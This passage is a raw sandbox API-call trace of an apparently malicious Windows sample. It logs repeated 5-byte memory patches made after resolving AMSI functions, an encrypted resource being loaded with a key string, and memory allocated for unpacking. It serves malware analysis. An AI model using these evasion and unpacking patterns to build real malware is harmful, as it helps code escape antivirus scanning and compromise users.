(hModule=0x74dc0000, lpProcName="CoAddRefServerProcess") returned 0x76380d30 [0126.223] GetProcAddress (hModule=0x74dc0000, lpProcName="CoReleaseServerProcess") returned 0x76383950 [0126.223] GetProcAddress (hModule=0x74dc0000, lpProcName="CoResumeClassObjects") returned 0x763898c0 [0126.224] GetProcAddress (hModule=0x74dc0000, lpProcName="CoSuspendClassObjects") returned 0x762f2d80 [0126.234] GetDC (hWnd=0x0) returned 0xa0100d0 [0126.235] GetDeviceCaps (hdc=0xa0100d0, index=90) returned 96 [0126.235] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0126.235] GetDC (hWnd=0x0) returned 0xa0100d0 [0126.235] GetDeviceCaps (hdc=0xa0100d0, index=104) returned 0 [0126.235] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0126.235] CreatePalette (plpal=0x416f344) returned 0x2b080992 [0126.235] GetStockObject (i=7) returned 0x1b00017 [0126.236] GetStockObject (i=5) returned 0x1900015 [0126.236] GetStockObject (i=13) returned 0x18a0048 [0126.236] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0126.236] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0126.242] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", ulOptions=0x0, samDesired=0x20019, phkResult=0x416f620 | out: phkResult=0x416f620*=0x554) returned 0x0 [0126.249] RegQueryValueExA (in: hKey=0x554, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x416f5f0, lpData=0x0, lpcbData=0x416f60c*=0x0 | out: lpType=0x416f5f0*=0x1, lpData=0x0, lpcbData=0x416f60c*=0x7) returned 0x0 [0126.249] RegQueryValueExA (in: hKey=0x554, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0x416f608, lpData=0x4ec8fe0, lpcbData=0x416f618*=0x7 | out: lpType=0x416f608*=0x1, lpData="Tahoma", lpcbData=0x416f618*=0x7) returned 0x0 [0126.249] RegCloseKey (hKey=0x554) returned 0x0 [0126.256] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x554 [0126.256] QueryPerformanceFrequency (in: lpFrequency=0x4d4e5fc | out: lpFrequency=0x4d4e5fc*=100000000) returned 1 [0126.256] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0a0 [0126.261] SetErrorMode (uMode=0x8000) returned 0x0 [0126.261] LoadLibraryA (lpLibFileName="kernel.dll") returned 0x0 [0126.266] SetErrorMode (uMode=0x0) returned 0x8000 [0126.266] GetProcAddress (hModule=0x0, lpProcName="InterlockedCompareExchange64") returned 0x0 [0126.271] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0126.272] SysReAllocStringLen (in: pbstr=0x4d4a13c*=0x0, psz="USERPROFILE", len=0xb | out: pbstr=0x4d4a13c*="USERPROFILE") returned 1 [0126.273] SysReAllocStringLen (in: pbstr=0x4d4a138*=0x0, psz="*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@", len=0x24 | out: pbstr=0x4d4a138*="*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@") returned 1 [0126.278] FindResourceA (hModule=0x4d20000, lpName="DVCLAL", lpType=0xa) returned 0x4d55048 [0126.278] QueryPerformanceCounter (in: lpPerformanceCount=0x416f778 | out: lpPerformanceCount=0x416f778*=3478277375379) returned 1 [0126.283] InetIsOffline () returned 0x0 [0126.284] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0126.284] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0126.285] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0126.285] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0126.289] GetCurrentProcess () returned 0xffffffff [0126.289] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0126.289] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0126.289] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0126.289] LoadLibraryA (lpLibFileName="smartscreenps") returned 0x0 [0126.290] LoadLibraryA (lpLibFileName="smartscreenps") returned 0x0 [0126.291] LoadLibraryA (lpLibFileName="psapi") returned 0x764d0000 [0126.358] GetModuleHandleA (lpModuleName="psapi") returned 0x764d0000 [0126.358] GetProcAddress (hModule=0x764d0000, lpProcName="GetModuleInformation") returned 0x764d1400 [0126.358] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0126.361] GetCurrentProcess () returned 0xffffffff [0126.361] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0126.361] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0126.361] FreeLibrary (hLibModule=0x764d00ff) returned 0 [0126.361] LoadLibraryA (lpLibFileName="mssip32") returned 0x6f860000 [0126.367] GetModuleHandleA (lpModuleName="mssip32") returned 0x6f860000 [0126.367] GetProcAddress (hModule=0x6f860000, lpProcName="CryptSIPCreateIndirectData") returned 0x6f861380 [0126.367] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0126.369] GetCurrentProcess () returned 0xffffffff [0126.369] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0126.369] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0126.369] FreeLibrary (hLibModule=0x6f8600ff) returned 0 [0126.369] LoadLibraryA (lpLibFileName="mssip32") returned 0x6f860000 [0126.370] GetModuleHandleA (lpModuleName="mssip32") returned 0x6f860000 [0126.370] GetProcAddress (hModule=0x6f860000, lpProcName="CryptSIPGetInfo") returned 0x6f8613a0 [0126.370] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0126.372] GetCurrentProcess () returned 0xffffffff [0126.372] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0126.372] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0126.373] FreeLibrary (hLibModule=0x6f8600ff) returned 0 [0126.373] LoadLibraryA (lpLibFileName="mssip32") returned 0x6f860000 [0126.373] GetModuleHandleA (lpModuleName="mssip32") returned 0x6f860000 [0126.373] GetProcAddress (hModule=0x6f860000, lpProcName="CryptSIPGetSignedDataMsg") returned 0x6f861340 [0126.374] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0126.377] GetCurrentProcess () returned 0xffffffff [0126.377] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0126.377] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0126.378] FreeLibrary (hLibModule=0x6f8600ff) returned 0 [0126.378] LoadLibraryA (lpLibFileName="mssip32") returned 0x6f860000 [0126.378] GetModuleHandleA (lpModuleName="mssip32") returned 0x6f860000 [0126.378] GetProcAddress (hModule=0x6f860000, lpProcName="CryptSIPVerifyIndirectData") returned 0x6f861370 [0126.378] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0126.381] GetCurrentProcess () returned 0xffffffff [0126.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0126.382] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0126.382] FreeLibrary (hLibModule=0x6f8600ff) returned 0 [0126.382] LoadLibraryA (lpLibFileName="wuapi") returned 0x6f7a0000 [0127.608] GetModuleHandleA (lpModuleName="wuapi") returned 0x6f7a0000 [0127.609] GetProcAddress (hModule=0x6f7a0000, lpProcName="DllGetClassObject") returned 0x6f7bbf10 [0127.609] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0127.614] GetCurrentProcess () returned 0xffffffff [0127.614] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0127.614] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0127.615] FreeLibrary (hLibModule=0x6f7a00ff) returned 0 [0127.621] LoadLibraryA (lpLibFileName="softpub") returned 0x6f790000 [0127.718] GetModuleHandleA (lpModuleName="softpub") returned 0x6f790000 [0127.718] GetProcAddress (hModule=0x6f790000, lpProcName="SoftpubDefCertInit") returned 0x6f7913f0 [0127.718] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0127.721] GetCurrentProcess () returned 0xffffffff [0127.721] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0127.721] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0127.722] FreeLibrary (hLibModule=0x6f7900ff) returned 0 [0127.722] LoadLibraryA (lpLibFileName="softpub") returned 0x6f790000 [0127.722] GetModuleHandleA (lpModuleName="softpub") returned 0x6f790000 [0127.723] GetProcAddress (hModule=0x6f790000, lpProcName="FindCertsByIssuer") returned 0x6f791490 [0127.723] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0127.725] GetCurrentProcess () returned 0xffffffff [0127.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0127.725] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0127.725] FreeLibrary (hLibModule=0x6f7900ff) returned 0 [0127.725] LoadLibraryA (lpLibFileName="softpub") returned 0x6f790000 [0127.726] GetModuleHandleA (lpModuleName="softpub") returned 0x6f790000 [0127.726] GetProcAddress (hModule=0x6f790000, lpProcName="SoftpubCheckCert") returned 0x6f7913d0 [0127.726] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0127.728] GetCurrentProcess () returned 0xffffffff [0127.728] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0127.728] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0127.730] FreeLibrary (hLibModule=0x6f7900ff) returned 0 [0127.730] LoadLibraryA (lpLibFileName="softpub") returned 0x6f790000 [0127.731] GetModuleHandleA (lpModuleName="softpub") returned 0x6f790000 [0127.731] GetProcAddress (hModule=0x6f790000, lpProcName="SoftpubInitialize") returned 0x6f7913a0 [0127.731] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0127.734] GetCurrentProcess () returned 0xffffffff [0127.734] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0127.734] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0127.734] FreeLibrary (hLibModule=0x6f7900ff) returned 0 [0127.734] LoadLibraryA (lpLibFileName="aadauthhelper") returned 0x0 [0127.735] LoadLibraryA (lpLibFileName="aadauthhelper") returned 0x0 [0127.735] LoadLibraryA (lpLibFileName="aadtb") returned 0x0 [0127.736] LoadLibraryA (lpLibFileName="aadWamExtension") returned 0x0 [0127.736] LoadLibraryA (lpLibFileName="aadtb") returned 0x0 [0127.737] LoadLibraryA (lpLibFileName="AcGenral") returned 0x0 [0127.737] LoadLibraryA (lpLibFileName="AcSpecfc") returned 0x0 [0127.738] LoadLibraryA (lpLibFileName="activeds") returned 0x6f530000 [0128.761] GetModuleHandleA (lpModuleName="activeds") returned 0x6f530000 [0128.761] GetProcAddress (hModule=0x6f530000, lpProcName="SecurityDescriptorToBinarySD") returned 0x6f5523e0 [0128.761] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0128.764] GetCurrentProcess () returned 0xffffffff [0128.764] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0128.764] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0128.764] FreeLibrary (hLibModule=0x6f5300ff) returned 0 [0128.764] LoadLibraryA (lpLibFileName="advapi32") returned 0x76600000 [0128.764] GetModuleHandleA (lpModuleName="advapi32") returned 0x76600000 [0128.765] GetProcAddress (hModule=0x76600000, lpProcName="NotifyServiceStatusChange") returned 0x76625900 [0128.765] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0128.767] GetCurrentProcess () returned 0xffffffff [0128.767] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0128.767] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0128.767] FreeLibrary (hLibModule=0x766000ff) returned 0 [0128.767] LoadLibraryA (lpLibFileName="advapi32") returned 0x76600000 [0128.768] GetModuleHandleA (lpModuleName="advapi32") returned 0x76600000 [0128.768] GetProcAddress (hModule=0x76600000, lpProcName="NotifyChangeEventLog") returned 0x76633450 [0128.768] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0128.770] GetCurrentProcess () returned 0xffffffff [0128.770] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0128.770] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0128.771] FreeLibrary (hLibModule=0x766000ff) returned 0 [0128.771] LoadLibraryA (lpLibFileName="advapi32") returned 0x76600000 [0128.771] GetModuleHandleA (lpModuleName="advapi32") returned 0x76600000 [0128.771] GetProcAddress (hModule=0x76600000, lpProcName="SaferiIsExecutableFileType") returned 0x76640160 [0128.771] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0128.774] GetCurrentProcess () returned 0xffffffff [0128.774] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0128.774] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0128.774] FreeLibrary (hLibModule=0x766000ff) returned 0 [0128.774] LoadLibraryA (lpLibFileName="advpack") returned 0x6f4c0000 [0129.576] GetModuleHandleA (lpModuleName="advpack") returned 0x6f4c0000 [0129.577] GetProcAddress (hModule=0x6f4c0000, lpProcName="LaunchINFSection") returned 0x6f4cd1c0 [0129.577] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0129.580] GetCurrentProcess () returned 0xffffffff [0129.580] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0129.580] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0129.580] FreeLibrary (hLibModule=0x6f4c00ff) returned 0 [0129.580] LoadLibraryA (lpLibFileName="aepic") returned 0x0 [0129.581] LoadLibraryA (lpLibFileName="ahadmin") returned 0x0 [0129.582] LoadLibraryA (lpLibFileName="amstream") returned 0x6f4a0000 [0130.680] GetModuleHandleA (lpModuleName="amstream") returned 0x6f4a0000 [0130.680] GetProcAddress (hModule=0x6f4a0000, lpProcName="DllGetClassObject") returned 0x6f4a4e80 [0130.681] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0130.683] GetCurrentProcess () returned 0xffffffff [0130.683] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0130.683] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0130.684] FreeLibrary (hLibModule=0x6f4a00ff) returned 0 [0130.684] LoadLibraryA (lpLibFileName="ahadmin") returned 0x0 [0130.685] LoadLibraryA (lpLibFileName="ApiSetHost.AppExecutionAlias") returned 0x0 [0130.686] LoadLibraryA (lpLibFileName="AppxSip") returned 0x6f370000 [0131.833] GetModuleHandleA (lpModuleName="AppxSip") returned 0x6f370000 [0131.839] GetProcAddress (hModule=0x6f370000, lpProcName="P7xSipVerifyIndirectData") returned 0x6f380540 [0131.839] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0131.872] GetCurrentProcess () returned 0xffffffff [0131.872] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0131.872] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0131.873] FreeLibrary (hLibModule=0x6f3700ff) returned 0 [0131.879] LoadLibraryA (lpLibFileName="certca") returned 0x6f150000 [0133.928] malloc (_Size=0x80) returned 0x2205ae8 [0133.973] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".dll", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 1 [0133.973] LocalAlloc (uFlags=0x0, uBytes=0x16) returned 0x6e24e0 [0133.973] memcpy (in: _Dst=0x6e24e0, _Src=0x6f151750, _Size=0x16 | out: _Dst=0x6e24e0) returned 0x6e24e0 [0133.973] LocalAlloc (uFlags=0x0, uBytes=0x1e) returned 0x6e1770 [0133.973] LocalFree (hMem=0x6e24e0) returned 0x0 [0133.973] LocalFree (hMem=0x0) returned 0x0 [0133.973] LocalFree (hMem=0x0) returned 0x0 [0133.973] DisableThreadLibraryCalls (hLibModule=0x6f150000) returned 1 [0133.974] GetModuleHandleA (lpModuleName="certca") returned 0x6f150000 [0133.975] GetProcAddress (hModule=0x6f150000, lpProcName="CAAccessCheck") returned 0x6f1bfb40 [0133.975] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0133.978] GetCurrentProcess () returned 0xffffffff [0133.978] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0133.978] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0133.978] FreeLibrary (hLibModule=0x6f1500ff) returned 0 [0133.978] LoadLibraryA (lpLibFileName="certcli") returned 0x6f0f0000 [0134.820] malloc (_Size=0x80) returned 0x2209230 [0134.827] __dllonexit () returned 0x6f131dd0 [0134.827] __dllonexit () returned 0x6f131df0 [0134.827] __dllonexit () returned 0x6f131e40 [0134.827] __dllonexit () returned 0x6f131da0 [0134.828] __dllonexit () returned 0x6f131ec0 [0134.829] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".dll", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 1 [0134.831] LocalAlloc (uFlags=0x0, uBytes=0x18) returned 0x6e22c0 [0134.831] memcpy (in: _Dst=0x6e22c0, _Src=0x6f0f2974, _Size=0x18 | out: _Dst=0x6e22c0) returned 0x6e22c0 [0134.831] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x6e1608 [0134.834] LocalFree (hMem=0x6e22c0) returned 0x0 [0134.834] LocalFree (hMem=0x0) returned 0x0 [0134.834] LocalFree (hMem=0x0) returned 0x0 [0134.834] DisableThreadLibraryCalls (hLibModule=0x6f0f0000) returned 1 [0134.835] GetModuleHandleA (lpModuleName="certcli") returned 0x6f0f0000 [0134.835] GetProcAddress (hModule=0x6f0f0000, lpProcName="CAGetCertTypeAccessRights") returned 0x6f1c10c0 [0134.835] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0134.838] GetCurrentProcess () returned 0xffffffff [0134.838] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0134.838] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0134.839] FreeLibrary (hLibModule=0x6f0f00ff) returned 0 [0134.839] LoadLibraryA (lpLibFileName="CertPolEng") returned 0x6f0d0000 [0135.085] GetModuleHandleA (lpModuleName="CertPolEng") returned 0x6f0d0000 [0135.086] GetProcAddress (hModule=0x6f0d0000, lpProcName="PstGetCertificates") returned 0x6f0d9080 [0135.086] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0135.090] GetCurrentProcess () returned 0xffffffff [0135.090] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0135.090] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0135.091] FreeLibrary (hLibModule=0x6f0d00ff) returned 0 [0135.091] LoadLibraryA (lpLibFileName="crypt32") returned 0x73f90000 [0135.091] GetModuleHandleA (lpModuleName="crypt32") returned 0x73f90000 [0135.092] GetProcAddress (hModule=0x73f90000, lpProcName="CertGetIssuerCertificateFromStore") returned 0x7400de40 [0135.092] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0135.095] GetCurrentProcess () returned 0xffffffff [0135.095] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0135.095] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0135.096] FreeLibrary (hLibModule=0x73f900ff) returned 0 [0135.096] LoadLibraryA (lpLibFileName="RaCertMgr") returned 0x0 [0135.099] LoadLibraryA (lpLibFileName="rasapi32") returned 0x6f020000 [0136.564] GetModuleHandleA (lpModuleName="rasapi32") returned 0x6f020000 [0136.564] GetProcAddress (hModule=0x6f020000, lpProcName="RasGetAutoTriggerConnectStatus") returned 0x6f0406b0 [0136.564] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0136.568] GetCurrentProcess () returned 0xffffffff [0136.568] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0136.568] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0136.568] FreeLibrary (hLibModule=0x6f0200ff) returned 0 [0136.573] LoadLibraryA (lpLibFileName="TrustedSignalCredProv") returned 0x0 [0136.590] GetFileAttributesA (lpFileName="SndVol.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sndvol.exe")) returned 0xffffffff [0136.590] QueryPerformanceCounter (in: lpPerformanceCount=0x416f778 | out: lpPerformanceCount=0x416f778*=3479308568125) returned 1 [0136.590] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0136.591] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0136.591] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0136.591] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0136.595] GetCurrentProcess () returned 0xffffffff [0136.595] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0136.596] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0136.596] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0136.601] FindResourceA (hModule=0x4d20000, lpName="DVCLAL", lpType=0xa) returned 0x4d55048 [0136.601] SizeofResource (hModule=0x4d20000, hResInfo=0x4d55048) returned 0x2e5bc [0136.601] LoadResource (hModule=0x4d20000, hResInfo=0x4d55048) returned 0x4d55068 [0136.601] LockResource (hResData=0x4d55068) returned 0x4d55068 [0136.621] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@", cchWideChar=36, lpMultiByteStr=0x416e770, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@", lpUsedDefaultChar=0x0) returned 36 [0136.625] VirtualAlloc (lpAddress=0x0, dwSize=0xc0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fdf0000 [0136.654] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0136.655] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0136.655] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0136.655] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x4) returned 1 [0136.659] GetCurrentProcess () returned 0xffffffff [0136.659] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4d4e60c, dwSize=0x5) returned 1 [0136.659] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416f73c | out: lpflOldProtect=0x416f73c*=0x40) returned 1 [0136.659] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0136.663] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0136.664] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0136.664] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0136.664] VirtualProtect (in: lpAddress=0x4d4e60c, dwSize=0x5, 